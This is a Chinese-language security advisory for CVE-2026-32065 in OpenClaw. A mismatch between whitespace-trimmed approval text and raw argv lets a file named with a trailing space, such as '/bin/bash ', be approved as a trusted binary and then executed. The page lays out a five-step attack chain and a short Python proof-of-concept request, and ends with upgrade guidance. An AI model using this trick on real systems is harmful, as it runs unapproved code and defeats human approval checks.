CVE-2026-32065 CVSS 4.8 中危

CVE-2026-32065 OpenClaw批准绕过漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32065

漏洞类型

逻辑漏洞

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.2.25之前的版本中存在批准完整性绕过漏洞。在system.run功能中，审批身份验证使用的命令文本会对argv标记进行空白符修剪，而实际运行时执行使用的是原始argv。攻击者可在可执行文件令牌后添加尾随空格（如'/bin/bash '），诱骗审批者批准看似安全的命令，实则执行不同的恶意二进制文件，导致非预期的命令执行。

技术细节

该漏洞源于OpenClaw处理命令审批与执行时的逻辑不一致。审批流程渲染命令文本时修剪argv空白符以生成审批ID，但执行阶段直接使用原始argv。攻击者利用此差异，创建带有尾随空格的恶意可执行文件（如'evil_script '）。发起请求时引用该文件，审批者界面显示修剪后的'evil_script'，若对应已知安全二进制则可能误批。最终系统运行原始参数即带空格的恶意文件，绕过审批机制执行任意代码。

攻击链分析

STEP 1

准备阶段

攻击者在系统中创建一个带有尾随空格的恶意可执行文件（例如：/bin/malicious_cmd ）。

STEP 2

发起请求

攻击者调用OpenClaw的system.run接口，请求执行带有尾随空格的命令。

STEP 3

审批欺骗

OpenClaw在生成审批请求时，修剪了命令中的空白符。审批者看到的是看似合法的命令（如/bin/malicious_cmd）并批准执行。

STEP 4

漏洞利用

OpenClaw运行时使用原始参数执行命令，实际运行了带有尾随空格的恶意文件。

STEP 5

达成效果

恶意代码在OpenClaw运行时用户的上下文中被执行，导致非预期的命令执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-32065: OpenClaw Approval Integrity Bypass
# Attacker creates a malicious file named '/bin/bash ' (with trailing space)
# which is distinct from the legitimate '/bin/bash'.

import requests

def exploit():
    # Target vulnerable OpenClaw instance
    url = "https://target-openclaw-instance/api/system.run"
    
    # The payload uses a trailing space to bypass approval check
    # Approver sees "/bin/bash", execution runs "/bin/bash "
    payload = {
        "command": "/bin/bash ",  
        "args": ["-c", "id"]
    }
    
    headers = {"Content-Type": "application/json"}
    
    print("[*] Sending malicious request with trailing space...")
    r = requests.post(url, json=payload, headers=headers)
    print(f"[+] Response: {r.text}")

if __name__ == "__main__":
    exploit()

影响范围

OpenClaw < 2026.2.25

防御指南

临时缓解措施

建议立即升级到OpenClaw 2026.2.25或更高版本以修复此漏洞。如果暂时无法升级，应严格审查系统中的可执行文件，特别是带有特殊字符（如尾随空格）的文件，并对审批日志进行深度审计，确保原始命令参数与批准内容一致。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表